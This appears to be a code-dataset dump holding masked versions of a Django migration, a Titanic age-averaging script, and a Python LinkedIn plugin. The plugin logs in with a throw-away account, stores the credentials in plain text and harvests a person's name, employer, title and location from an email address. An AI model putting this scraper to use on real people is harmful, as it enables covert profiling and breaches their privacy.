('title', models.CharField(max_length=20)),\r\n ],\r\n ),\r\n migrations.CreateModel(\r\n name='Task',\r\n fields=[\r\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n ('title', models.CharField(max_length=50, null=True)),\r\n ('description', models.CharField(max_length=500)),\r\n ('priority', models.IntegerField(choices=[(0, 'unimportant'), (1, 'insignificant'), (2, 'important'), (3, 'Necessary')], default=0)),\r\n ('status', models.CharField(choices=[('deleted', 'deleted'), ('doing', 'doing'), ('done', 'done'), ('expire', 'expire'), ('archive', 'archive')], default='doing', max_length=10)),\r\n ('expired', models.DateTimeField(blank=True, null=True)),\r\n ('created', models.DateTimeField(auto_now_add=True)),\r\n ('updated', models.DateTimeField(auto_now=True)),\r\n ('category', models.ManyToManyField(default='unknown', to='todo.Category')),\r\n ],\r\n ),\r\n ]\r\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from __future__ import print_function from __future__ import absolute_import # # LinkedIn Sales Module # import requests from bs4 import BeautifulSoup import logging from plugins.base import PageGrabber from plugins.colors import BodyColors as bc import json try: import __builtin__ as bi except: import builtins as bi class LinkedInGrabber(PageGrabber): # LinkedIN.com sales scraper for email lookups def get_info(self,email): # Requires AUTH, login and request AUTHENTICATED pages from linkedin client = requests.Session() # Establish the session() print("["+bc.CPRP+"?"+bc.CEND+"] "+bc.CCYN + "LinkedIn" + bc.CEND) HOMEPAGE_URL = 'https://www.linkedin.com' # Set homepage for linkedin LOGIN_URL = 'https://www.linkedin.com/uas/login-submit' # Set login page for linkedin LOGOUT_URL = 'https://www.linkedin.com/m/logout' source = client.get(HOMEPAGE_URL).content # Request source soup = self.get_dom(source) # BS DOM csrf = soup.find(id="loginCsrfParam-login")['value'] # # ATTENTION:: YOU MUST POPULATE THE FOLLOWING WITH YOUR REAL CREDENTIALS # # ATTENTION:: THIS WILL NOT WORK PROPRLY OTHERWISE # # session_key = email session_password = your password # try: with open('./storage/fb_login', 'r') as fbinfo: login_information = json.loads(fbinfo.read()) #print(json.loads(login_information)) login_information['loginCsrfParam'] = csrf except: login_information = { 'session_key':'', 'session_password':'', 'loginCsrfParam': '', } pass if not login_information['session_key']: if login_information['session_password'] == '': # If no modifications of default u/p, print error, return print (" ["+bc.CRED+"ATTENTION"+bc.CEND+"] " + \ bc.CYLW+"\tThis module requires authentication to use it properly.\n\tIt will store Credential pairs in plain-text."+bc.CEND) print (" ["+bc.CRED+"ATTENTION"+bc.CEND+"] " + \ bc.CYLW + "This could produce a trail and identify the used account."+bc.CEND) print() savecreds = raw_input("[{}?{}] {}Would you like to save credentials now? {}(Y/n){}]: ".format(bc.CRED,bc.CEND,bc.CRED,bc.CYLW,bc.CEND)) print() luser = raw_input(" ["+bc.CRED+"?"+bc.CEND+"] " + \ bc.CYLW+"What is your throw-away linkedin username: "+bc.CEND) lpass = raw_input(" ["+bc.CRED+"?"+bc.CEND+"] " + \ bc.CYLW+"What is your throw-away linkedin password: "+bc.CEND) login_information = { 'session_key':luser, 'session_password':lpass, 'loginCsrfParam': csrf, } if str(savecreds).lower() in ['y','yes']: try: with open('./storage/fb_login','w') as fbinfo: fbinfo.write(json.dumps(login_information)) except Exception as failedtowrite: print(("Failed to write fbinfo to file: %s") % failedtowrite) try: client.post(LOGIN_URL, data=login_information) results = client.get('https://linkedin.com/sales/gmail/profile/viewByEmail/'+str(email)).text except Exception as failedlinkedinauth: print((" ["+bc.CRED+"X"+bc.CEND+"] " + \ bc.CYLW+"This module did not properly authenticate: %s" + \ bc.CEND) % failedlinkedinauth) soup = self.get_dom(results) self.get_source(LOGOUT_URL) # Log out of LinkedIn, kills sessionID try: # Search and set from results profile = soup.find('a',attrs={'class': 'li-hover-under li-txt-black-85'})['href'] print(" ["+bc.CGRN+"+"+bc.CEND+"] "+ \ bc.CRED+"Profile: "+bc.CEND + \ str(profile) ) except: print(" ["+bc.CRED+"X"+bc.CEND+"] " + \ bc.CYLW+"No LinkedIn account found.\n" + \ bc.CEND ) return try: fname = soup.find('span',attrs={'id': 'li-profile-name'})['data-fname'] lname = soup.find('span',attrs={'id': 'li-profile-name'})['data-lname'] name = str(fname) + " " + str(lname) print(" ["+bc.CGRN+"+"+bc.CEND+"] " + \ bc.CRED+"Name: " + \ bc.CEND+ str(fname) + \ " " + \ str(lname) ) except: name = "" pass # print (" ["+bc.CRED+"X"+bc.CEND+"] "+bc.CYLW+"No username can be found.\n"+bc.CEND) try: company = soup.find('span',{'class': 'li-user-title-company'}).get_text() print(" ["+bc.CGRN+"+"+bc.CEND+"] " + \ bc.CRED+"Company: " + \ bc.CEND + str(company) ) except: company = "" pass # print (" ["+bc.CRED+"X"+bc.CEND+"] "+bc.CYLW+"No Company can be found.\n"+bc.CEND) try: title = soup.find('div',{'class':'li-user-title'}).get_text() print(" ["+bc.CGRN+"+"+bc.CEND+"] " + \ bc.CRED+"Title: " + \ bc.CEND+\ str(title) ) except: title = "" pass #print (" ["+bc.CRED+"X"+bc.CEND+"] "+bc.CYLW+"No Job Title can be found.\n"+bc.CEND) try: location = soup.find('div', {'class':'li-user-location'}).get_text() print(" ["+bc.CGRN+"+"+bc.CEND+"] "+bc.CRED+"Location: "+bc.CEND+ str(location)) except: location = "" pass #print (" ["+bc.CRED+"X"+bc.CEND+"] "+bc.CYLW+"No Location can be found.\n"+bc.CEND) try: email = soup.find('span', {'id':'email'}).get_text() print(" ["+bc.CGRN+"+"+bc.CEND+"] "+bc.CRED+"Email: "+bc.CEND+ str(email)) except: email ="" pass #print (" ["+bc.CRED+"X"+bc.CEND+"] "+bc.CYLW+"No Email account found.\n"+bc.CEND) self.info_dict.update({ "profile": profile, "name": name, "location": location, "company": company, "title":title, "email":email }) bi.outdata['linkedin'] = self.info_dict print() return
normal
{ "blob_id": "570e0d46aa1ea88d1784447e8f693199e3c3b6ad", "index": 9488, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass LinkedInGrabber(PageGrabber):\n\n def get_info(self, email):\n client = requests.Session()\n print('[' + bc.CPRP + '?' + bc.CEND + '] ' + bc.CCYN + 'LinkedIn' +\n bc.CEND)\n HOMEPAGE_URL = 'https://www.linkedin.com'\n LOGIN_URL = 'https://www.linkedin.com/uas/login-submit'\n LOGOUT_URL = 'https://www.linkedin.com/m/logout'\n source = client.get(HOMEPAGE_URL).content\n soup = self.get_dom(source)\n csrf = soup.find(id='loginCsrfParam-login')['value']\n try:\n with open('./storage/fb_login', 'r') as fbinfo:\n login_information = json.loads(fbinfo.read())\n login_information['loginCsrfParam'] = csrf\n except:\n login_information = {'session_key': '', 'session_password': '',\n 'loginCsrfParam': ''}\n pass\n if not login_information['session_key']:\n if login_information['session_password'] == '':\n print(' [' + bc.CRED + 'ATTENTION' + bc.CEND + '] ' + bc.\n CYLW +\n \"\"\"\tThis module requires authentication to use it properly.\n\tIt will store Credential pairs in plain-text.\"\"\"\n + bc.CEND)\n print(' [' + bc.CRED + 'ATTENTION' + bc.CEND + '] ' + bc.\n CYLW +\n 'This could produce a trail and identify the used account.'\n + bc.CEND)\n print()\n savecreds = raw_input(\n '[{}?{}] {}Would you like to save credentials now? {}(Y/n){}]: '\n .format(bc.CRED, bc.CEND, bc.CRED, bc.CYLW, bc.CEND))\n print()\n luser = raw_input(' [' + bc.CRED + '?' + bc.CEND + '] ' +\n bc.CYLW + 'What is your throw-away linkedin username: ' +\n bc.CEND)\n lpass = raw_input(' [' + bc.CRED + '?' + bc.CEND + '] ' +\n bc.CYLW + 'What is your throw-away linkedin password: ' +\n bc.CEND)\n login_information = {'session_key': luser,\n 'session_password': lpass, 'loginCsrfParam': csrf}\n if str(savecreds).lower() in ['y', 'yes']:\n try:\n with open('./storage/fb_login', 'w') as fbinfo:\n fbinfo.write(json.dumps(login_information))\n except Exception as failedtowrite:\n print('Failed to write fbinfo to file: %s' %\n failedtowrite)\n try:\n client.post(LOGIN_URL, data=login_information)\n results = client.get(\n 'https://linkedin.com/sales/gmail/profile/viewByEmail/' +\n str(email)).text\n except Exception as failedlinkedinauth:\n print((' [' + bc.CRED + 'X' + bc.CEND + '] ' + bc.CYLW +\n 'This module did not properly authenticate: %s' + bc.CEND) %\n failedlinkedinauth)\n soup = self.get_dom(results)\n self.get_source(LOGOUT_URL)\n try:\n profile = soup.find('a', attrs={'class':\n 'li-hover-under li-txt-black-85'})['href']\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Profile: ' + bc.CEND + str(profile))\n except:\n print(' [' + bc.CRED + 'X' + bc.CEND + '] ' + bc.CYLW +\n \"\"\"No LinkedIn account found.\n\"\"\" + bc.CEND)\n return\n try:\n fname = soup.find('span', attrs={'id': 'li-profile-name'})[\n 'data-fname']\n lname = soup.find('span', attrs={'id': 'li-profile-name'})[\n 'data-lname']\n name = str(fname) + ' ' + str(lname)\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Name: ' + bc.CEND + str(fname) + ' ' + str(lname))\n except:\n name = ''\n pass\n try:\n company = soup.find('span', {'class': 'li-user-title-company'}\n ).get_text()\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Company: ' + bc.CEND + str(company))\n except:\n company = ''\n pass\n try:\n title = soup.find('div', {'class': 'li-user-title'}).get_text()\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Title: ' + bc.CEND + str(title))\n except:\n title = ''\n pass\n try:\n location = soup.find('div', {'class': 'li-user-location'}\n ).get_text()\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Location: ' + bc.CEND + str(location))\n except:\n location = ''\n pass\n try:\n email = soup.find('span', {'id': 'email'}).get_text()\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Email: ' + bc.CEND + str(email))\n except:\n email = ''\n pass\n self.info_dict.update({'profile': profile, 'name': name, 'location':\n location, 'company': company, 'title': title, 'email': email})\n bi.outdata['linkedin'] = self.info_dict\n print()\n return\n", "step-3": "<mask token>\ntry:\n import __builtin__ as bi\nexcept:\n import builtins as bi\n\n\nclass LinkedInGrabber(PageGrabber):\n\n def get_info(self, email):\n client = requests.Session()\n print('[' + bc.CPRP + '?' + bc.CEND + '] ' + bc.CCYN + 'LinkedIn' +\n bc.CEND)\n HOMEPAGE_URL = 'https://www.linkedin.com'\n LOGIN_URL = 'https://www.linkedin.com/uas/login-submit'\n LOGOUT_URL = 'https://www.linkedin.com/m/logout'\n source = client.get(HOMEPAGE_URL).content\n soup = self.get_dom(source)\n csrf = soup.find(id='loginCsrfParam-login')['value']\n try:\n with open('./storage/fb_login', 'r') as fbinfo:\n login_information = json.loads(fbinfo.read())\n login_information['loginCsrfParam'] = csrf\n except:\n login_information = {'session_key': '', 'session_password': '',\n 'loginCsrfParam': ''}\n pass\n if not login_information['session_key']:\n if login_information['session_password'] == '':\n print(' [' + bc.CRED + 'ATTENTION' + bc.CEND + '] ' + bc.\n CYLW +\n \"\"\"\tThis module requires authentication to use it properly.\n\tIt will store Credential pairs in plain-text.\"\"\"\n + bc.CEND)\n print(' [' + bc.CRED + 'ATTENTION' + bc.CEND + '] ' + bc.\n CYLW +\n 'This could produce a trail and identify the used account.'\n + bc.CEND)\n print()\n savecreds = raw_input(\n '[{}?{}] {}Would you like to save credentials now? {}(Y/n){}]: '\n .format(bc.CRED, bc.CEND, bc.CRED, bc.CYLW, bc.CEND))\n print()\n luser = raw_input(' [' + bc.CRED + '?' + bc.CEND + '] ' +\n bc.CYLW + 'What is your throw-away linkedin username: ' +\n bc.CEND)\n lpass = raw_input(' [' + bc.CRED + '?' + bc.CEND + '] ' +\n bc.CYLW + 'What is your throw-away linkedin password: ' +\n bc.CEND)\n login_information = {'session_key': luser,\n 'session_password': lpass, 'loginCsrfParam': csrf}\n if str(savecreds).lower() in ['y', 'yes']:\n try:\n with open('./storage/fb_login', 'w') as fbinfo:\n fbinfo.write(json.dumps(login_information))\n except Exception as failedtowrite:\n print('Failed to write fbinfo to file: %s' %\n failedtowrite)\n try:\n client.post(LOGIN_URL, data=login_information)\n results = client.get(\n 'https://linkedin.com/sales/gmail/profile/viewByEmail/' +\n str(email)).text\n except Exception as failedlinkedinauth:\n print((' [' + bc.CRED + 'X' + bc.CEND + '] ' + bc.CYLW +\n 'This module did not properly authenticate: %s' + bc.CEND) %\n failedlinkedinauth)\n soup = self.get_dom(results)\n self.get_source(LOGOUT_URL)\n try:\n profile = soup.find('a', attrs={'class':\n 'li-hover-under li-txt-black-85'})['href']\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Profile: ' + bc.CEND + str(profile))\n except:\n print(' [' + bc.CRED + 'X' + bc.CEND + '] ' + bc.CYLW +\n \"\"\"No LinkedIn account found.\n\"\"\" + bc.CEND)\n return\n try:\n fname = soup.find('span', attrs={'id': 'li-profile-name'})[\n 'data-fname']\n lname = soup.find('span', attrs={'id': 'li-profile-name'})[\n 'data-lname']\n name = str(fname) + ' ' + str(lname)\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Name: ' + bc.CEND + str(fname) + ' ' + str(lname))\n except:\n name = ''\n pass\n try:\n company = soup.find('span', {'class': 'li-user-title-company'}\n ).get_text()\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Company: ' + bc.CEND + str(company))\n except:\n company = ''\n pass\n try:\n title = soup.find('div', {'class': 'li-user-title'}).get_text()\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Title: ' + bc.CEND + str(title))\n except:\n title = ''\n pass\n try:\n location = soup.find('div', {'class': 'li-user-location'}\n ).get_text()\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Location: ' + bc.CEND + str(location))\n except:\n location = ''\n pass\n try:\n email = soup.find('span', {'id': 'email'}).get_text()\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Email: ' + bc.CEND + str(email))\n except:\n email = ''\n pass\n self.info_dict.update({'profile': profile, 'name': name, 'location':\n location, 'company': company, 'title': title, 'email': email})\n bi.outdata['linkedin'] = self.info_dict\n print()\n return\n", "step-4": "from __future__ import print_function\nfrom __future__ import absolute_import\nimport requests\nfrom bs4 import BeautifulSoup\nimport logging\nfrom plugins.base import PageGrabber\nfrom plugins.colors import BodyColors as bc\nimport json\ntry:\n import __builtin__ as bi\nexcept:\n import builtins as bi\n\n\nclass LinkedInGrabber(PageGrabber):\n\n def get_info(self, email):\n client = requests.Session()\n print('[' + bc.CPRP + '?' + bc.CEND + '] ' + bc.CCYN + 'LinkedIn' +\n bc.CEND)\n HOMEPAGE_URL = 'https://www.linkedin.com'\n LOGIN_URL = 'https://www.linkedin.com/uas/login-submit'\n LOGOUT_URL = 'https://www.linkedin.com/m/logout'\n source = client.get(HOMEPAGE_URL).content\n soup = self.get_dom(source)\n csrf = soup.find(id='loginCsrfParam-login')['value']\n try:\n with open('./storage/fb_login', 'r') as fbinfo:\n login_information = json.loads(fbinfo.read())\n login_information['loginCsrfParam'] = csrf\n except:\n login_information = {'session_key': '', 'session_password': '',\n 'loginCsrfParam': ''}\n pass\n if not login_information['session_key']:\n if login_information['session_password'] == '':\n print(' [' + bc.CRED + 'ATTENTION' + bc.CEND + '] ' + bc.\n CYLW +\n \"\"\"\tThis module requires authentication to use it properly.\n\tIt will store Credential pairs in plain-text.\"\"\"\n + bc.CEND)\n print(' [' + bc.CRED + 'ATTENTION' + bc.CEND + '] ' + bc.\n CYLW +\n 'This could produce a trail and identify the used account.'\n + bc.CEND)\n print()\n savecreds = raw_input(\n '[{}?{}] {}Would you like to save credentials now? {}(Y/n){}]: '\n .format(bc.CRED, bc.CEND, bc.CRED, bc.CYLW, bc.CEND))\n print()\n luser = raw_input(' [' + bc.CRED + '?' + bc.CEND + '] ' +\n bc.CYLW + 'What is your throw-away linkedin username: ' +\n bc.CEND)\n lpass = raw_input(' [' + bc.CRED + '?' + bc.CEND + '] ' +\n bc.CYLW + 'What is your throw-away linkedin password: ' +\n bc.CEND)\n login_information = {'session_key': luser,\n 'session_password': lpass, 'loginCsrfParam': csrf}\n if str(savecreds).lower() in ['y', 'yes']:\n try:\n with open('./storage/fb_login', 'w') as fbinfo:\n fbinfo.write(json.dumps(login_information))\n except Exception as failedtowrite:\n print('Failed to write fbinfo to file: %s' %\n failedtowrite)\n try:\n client.post(LOGIN_URL, data=login_information)\n results = client.get(\n 'https://linkedin.com/sales/gmail/profile/viewByEmail/' +\n str(email)).text\n except Exception as failedlinkedinauth:\n print((' [' + bc.CRED + 'X' + bc.CEND + '] ' + bc.CYLW +\n 'This module did not properly authenticate: %s' + bc.CEND) %\n failedlinkedinauth)\n soup = self.get_dom(results)\n self.get_source(LOGOUT_URL)\n try:\n profile = soup.find('a', attrs={'class':\n 'li-hover-under li-txt-black-85'})['href']\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Profile: ' + bc.CEND + str(profile))\n except:\n print(' [' + bc.CRED + 'X' + bc.CEND + '] ' + bc.CYLW +\n \"\"\"No LinkedIn account found.\n\"\"\" + bc.CEND)\n return\n try:\n fname = soup.find('span', attrs={'id': 'li-profile-name'})[\n 'data-fname']\n lname = soup.find('span', attrs={'id': 'li-profile-name'})[\n 'data-lname']\n name = str(fname) + ' ' + str(lname)\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Name: ' + bc.CEND + str(fname) + ' ' + str(lname))\n except:\n name = ''\n pass\n try:\n company = soup.find('span', {'class': 'li-user-title-company'}\n ).get_text()\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Company: ' + bc.CEND + str(company))\n except:\n company = ''\n pass\n try:\n title = soup.find('div', {'class': 'li-user-title'}).get_text()\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Title: ' + bc.CEND + str(title))\n except:\n title = ''\n pass\n try:\n location = soup.find('div', {'class': 'li-user-location'}\n ).get_text()\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Location: ' + bc.CEND + str(location))\n except:\n location = ''\n pass\n try:\n email = soup.find('span', {'id': 'email'}).get_text()\n print(' [' + bc.CGRN + '+' + bc.CEND + '] ' + bc.CRED +\n 'Email: ' + bc.CEND + str(email))\n except:\n email = ''\n pass\n self.info_dict.update({'profile': profile, 'name': name, 'location':\n location, 'company': company, 'title': title, 'email': email})\n bi.outdata['linkedin'] = self.info_dict\n print()\n return\n", "step-5": "from __future__ import print_function\nfrom __future__ import absolute_import\n#\n# LinkedIn Sales Module\n#\nimport requests\nfrom bs4 import BeautifulSoup\nimport logging\nfrom plugins.base import PageGrabber\nfrom plugins.colors import BodyColors as bc\nimport json\ntry:\n import __builtin__ as bi\nexcept:\n import builtins as bi\n\n\nclass LinkedInGrabber(PageGrabber): # LinkedIN.com sales scraper for email lookups\n def get_info(self,email): # Requires AUTH, login and request AUTHENTICATED pages from linkedin\n client = requests.Session() # Establish the session()\n print(\"[\"+bc.CPRP+\"?\"+bc.CEND+\"] \"+bc.CCYN + \"LinkedIn\" + bc.CEND)\n HOMEPAGE_URL = 'https://www.linkedin.com' # Set homepage for linkedin\n LOGIN_URL = 'https://www.linkedin.com/uas/login-submit' # Set login page for linkedin\n LOGOUT_URL = 'https://www.linkedin.com/m/logout'\n source = client.get(HOMEPAGE_URL).content # Request source\n soup = self.get_dom(source) # BS DOM\n csrf = soup.find(id=\"loginCsrfParam-login\")['value']\n #\n # ATTENTION:: YOU MUST POPULATE THE FOLLOWING WITH YOUR REAL CREDENTIALS\n #\n # ATTENTION:: THIS WILL NOT WORK PROPRLY OTHERWISE\n #\n # session_key = email session_password = your password\n #\n try:\n with open('./storage/fb_login', 'r') as fbinfo:\n login_information = json.loads(fbinfo.read())\n #print(json.loads(login_information))\n login_information['loginCsrfParam'] = csrf\n except:\n login_information = {\n 'session_key':'',\n 'session_password':'',\n 'loginCsrfParam': '',\n }\n pass\n if not login_information['session_key']:\n if login_information['session_password'] == '': # If no modifications of default u/p, print error, return\n print (\" [\"+bc.CRED+\"ATTENTION\"+bc.CEND+\"] \" + \\\n bc.CYLW+\"\\tThis module requires authentication to use it properly.\\n\\tIt will store Credential pairs in plain-text.\"+bc.CEND)\n print (\" [\"+bc.CRED+\"ATTENTION\"+bc.CEND+\"] \" + \\\n bc.CYLW + \"This could produce a trail and identify the used account.\"+bc.CEND)\n print()\n savecreds = raw_input(\"[{}?{}] {}Would you like to save credentials now? {}(Y/n){}]: \".format(bc.CRED,bc.CEND,bc.CRED,bc.CYLW,bc.CEND))\n print()\n luser = raw_input(\" [\"+bc.CRED+\"?\"+bc.CEND+\"] \" + \\\n bc.CYLW+\"What is your throw-away linkedin username: \"+bc.CEND)\n lpass = raw_input(\" [\"+bc.CRED+\"?\"+bc.CEND+\"] \" + \\\n bc.CYLW+\"What is your throw-away linkedin password: \"+bc.CEND)\n login_information = {\n 'session_key':luser,\n 'session_password':lpass,\n 'loginCsrfParam': csrf,\n }\n if str(savecreds).lower() in ['y','yes']:\n try:\n with open('./storage/fb_login','w') as fbinfo:\n fbinfo.write(json.dumps(login_information))\n except Exception as failedtowrite:\n print((\"Failed to write fbinfo to file: %s\") % failedtowrite)\n try:\n client.post(LOGIN_URL, data=login_information)\n results = client.get('https://linkedin.com/sales/gmail/profile/viewByEmail/'+str(email)).text\n except Exception as failedlinkedinauth:\n print((\" [\"+bc.CRED+\"X\"+bc.CEND+\"] \" + \\\n bc.CYLW+\"This module did not properly authenticate: %s\" + \\\n bc.CEND) % failedlinkedinauth)\n soup = self.get_dom(results)\n self.get_source(LOGOUT_URL) # Log out of LinkedIn, kills sessionID\n try: # Search and set from results\n profile = soup.find('a',attrs={'class': 'li-hover-under li-txt-black-85'})['href']\n print(\" [\"+bc.CGRN+\"+\"+bc.CEND+\"] \"+ \\\n bc.CRED+\"Profile: \"+bc.CEND + \\\n str(profile)\n )\n except:\n print(\" [\"+bc.CRED+\"X\"+bc.CEND+\"] \" + \\\n bc.CYLW+\"No LinkedIn account found.\\n\" + \\\n bc.CEND\n )\n return\n try:\n fname = soup.find('span',attrs={'id': 'li-profile-name'})['data-fname']\n lname = soup.find('span',attrs={'id': 'li-profile-name'})['data-lname']\n name = str(fname) + \" \" + str(lname)\n print(\" [\"+bc.CGRN+\"+\"+bc.CEND+\"] \" + \\\n bc.CRED+\"Name: \" + \\\n bc.CEND+ str(fname) + \\\n \" \" + \\\n str(lname)\n )\n except:\n name = \"\"\n pass # print (\" [\"+bc.CRED+\"X\"+bc.CEND+\"] \"+bc.CYLW+\"No username can be found.\\n\"+bc.CEND)\n try:\n company = soup.find('span',{'class': 'li-user-title-company'}).get_text()\n print(\" [\"+bc.CGRN+\"+\"+bc.CEND+\"] \" + \\\n bc.CRED+\"Company: \" + \\\n bc.CEND + str(company)\n )\n except:\n company = \"\"\n pass # print (\" [\"+bc.CRED+\"X\"+bc.CEND+\"] \"+bc.CYLW+\"No Company can be found.\\n\"+bc.CEND)\n try:\n title = soup.find('div',{'class':'li-user-title'}).get_text()\n print(\" [\"+bc.CGRN+\"+\"+bc.CEND+\"] \" + \\\n bc.CRED+\"Title: \" + \\\n bc.CEND+\\\n str(title)\n )\n except:\n title = \"\"\n pass #print (\" [\"+bc.CRED+\"X\"+bc.CEND+\"] \"+bc.CYLW+\"No Job Title can be found.\\n\"+bc.CEND)\n try:\n location = soup.find('div', {'class':'li-user-location'}).get_text()\n print(\" [\"+bc.CGRN+\"+\"+bc.CEND+\"] \"+bc.CRED+\"Location: \"+bc.CEND+ str(location))\n except:\n location = \"\"\n pass #print (\" [\"+bc.CRED+\"X\"+bc.CEND+\"] \"+bc.CYLW+\"No Location can be found.\\n\"+bc.CEND)\n try:\n email = soup.find('span', {'id':'email'}).get_text()\n print(\" [\"+bc.CGRN+\"+\"+bc.CEND+\"] \"+bc.CRED+\"Email: \"+bc.CEND+ str(email))\n except:\n email =\"\"\n pass #print (\" [\"+bc.CRED+\"X\"+bc.CEND+\"] \"+bc.CYLW+\"No Email account found.\\n\"+bc.CEND)\n self.info_dict.update({\n \"profile\": profile,\n \"name\": name,\n \"location\": location,\n \"company\": company,\n \"title\":title,\n \"email\":email\n })\n bi.outdata['linkedin'] = self.info_dict\n print()\n return\n", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
# the age of some survivors survived_age = [48.0, 15.0, 40.0, 36.0, 47.0, \ 32.0, 60.0, 31.0, 17.0, 36.0, 39.0, 36.0, 32.5, \ 39.0, 38.0, 36.0, 52.0, 29.0, 35.0, 35.0, 49.0, \ 16.0, 27.0, 22.0, 27.0, 35.0, 3.0, 11.0, 36.0, \ 1.0, 19.0, 24.0, 33.0, 43.0, 24.0, 32.0, 49.0, \ 30.0, 49.0, 60.0, 23.0, 26.0, 24.0, 40.0, 25.0, \ 36.0, 48.0, 21.0, 29.0, 24.0, 44.0, 41.0, 2.0, \ 28.0, 40.0, 22.0, 33.0, 35.0, 24.0, 28.0, 17.0, 16.0, 48.0] # the age of some victims non_survived_age = [47.0, 55.0, 36.0, 38.0, 19.0, \ 24.0, 36.0, 45.5, 45.0, 46.0, 57.0, 25.0, 58.0, \ 46.0, 50.0, 56.0, 58.0, 62.0, 64.0, 39.0, 21.0, \ 47.0, 45.0, 18.0, 70.0, 2.0, 36.0, 61.0, 47.0, \ 29.0, 40.0, 19.0, 65.0, 50.0, 54.0, 36.5, 31.0] # average age of survivors ave_survived_age = sum(survived_age)/len(survived_age) # take two decimal places ave_survived_age = round(ave_survived_age,2) # average age of victims ave_non_survived_age = sum(non_survived_age)/len(non_survived_age) ave_non_survived_age = round(ave_non_survived_age,2) print("The ave_age of survivors is {}".format(ave_survived_age)) print("The ave_age of victims is {}".format(ave_non_survived_age)) # The ave_age of survivors is 31.71 # The ave_age of victims is 42.65
normal
{ "blob_id": "85c51f155439ff0cb570faafc48ac8da094515bf", "index": 3362, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint('The ave_age of survivors is {}'.format(ave_survived_age))\nprint('The ave_age of victims is {}'.format(ave_non_survived_age))\n", "step-3": "survived_age = [48.0, 15.0, 40.0, 36.0, 47.0, 32.0, 60.0, 31.0, 17.0, 36.0,\n 39.0, 36.0, 32.5, 39.0, 38.0, 36.0, 52.0, 29.0, 35.0, 35.0, 49.0, 16.0,\n 27.0, 22.0, 27.0, 35.0, 3.0, 11.0, 36.0, 1.0, 19.0, 24.0, 33.0, 43.0, \n 24.0, 32.0, 49.0, 30.0, 49.0, 60.0, 23.0, 26.0, 24.0, 40.0, 25.0, 36.0,\n 48.0, 21.0, 29.0, 24.0, 44.0, 41.0, 2.0, 28.0, 40.0, 22.0, 33.0, 35.0, \n 24.0, 28.0, 17.0, 16.0, 48.0]\nnon_survived_age = [47.0, 55.0, 36.0, 38.0, 19.0, 24.0, 36.0, 45.5, 45.0, \n 46.0, 57.0, 25.0, 58.0, 46.0, 50.0, 56.0, 58.0, 62.0, 64.0, 39.0, 21.0,\n 47.0, 45.0, 18.0, 70.0, 2.0, 36.0, 61.0, 47.0, 29.0, 40.0, 19.0, 65.0, \n 50.0, 54.0, 36.5, 31.0]\nave_survived_age = sum(survived_age) / len(survived_age)\nave_survived_age = round(ave_survived_age, 2)\nave_non_survived_age = sum(non_survived_age) / len(non_survived_age)\nave_non_survived_age = round(ave_non_survived_age, 2)\nprint('The ave_age of survivors is {}'.format(ave_survived_age))\nprint('The ave_age of victims is {}'.format(ave_non_survived_age))\n", "step-4": "# the age of some survivors\nsurvived_age = [48.0, 15.0, 40.0, 36.0, 47.0, \\\n32.0, 60.0, 31.0, 17.0, 36.0, 39.0, 36.0, 32.5, \\\n39.0, 38.0, 36.0, 52.0, 29.0, 35.0, 35.0, 49.0, \\\n16.0, 27.0, 22.0, 27.0, 35.0, 3.0, 11.0, 36.0, \\\n1.0, 19.0, 24.0, 33.0, 43.0, 24.0, 32.0, 49.0, \\\n30.0, 49.0, 60.0, 23.0, 26.0, 24.0, 40.0, 25.0, \\\n36.0, 48.0, 21.0, 29.0, 24.0, 44.0, 41.0, 2.0, \\\n28.0, 40.0, 22.0, 33.0, 35.0, 24.0, 28.0, 17.0, 16.0, 48.0]\n\n# the age of some victims\nnon_survived_age = [47.0, 55.0, 36.0, 38.0, 19.0, \\\n24.0, 36.0, 45.5, 45.0, 46.0, 57.0, 25.0, 58.0, \\\n46.0, 50.0, 56.0, 58.0, 62.0, 64.0, 39.0, 21.0, \\\n47.0, 45.0, 18.0, 70.0, 2.0, 36.0, 61.0, 47.0, \\\n29.0, 40.0, 19.0, 65.0, 50.0, 54.0, 36.5, 31.0]\n\n# average age of survivors\nave_survived_age = sum(survived_age)/len(survived_age)\n\n# take two decimal places\nave_survived_age = round(ave_survived_age,2)\n\n# average age of victims\nave_non_survived_age = sum(non_survived_age)/len(non_survived_age)\n\nave_non_survived_age = round(ave_non_survived_age,2)\n\nprint(\"The ave_age of survivors is {}\".format(ave_survived_age))\nprint(\"The ave_age of victims is {}\".format(ave_non_survived_age))\n\n# The ave_age of survivors is 31.71\n# The ave_age of victims is 42.65\n\n\n\n\n\n\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
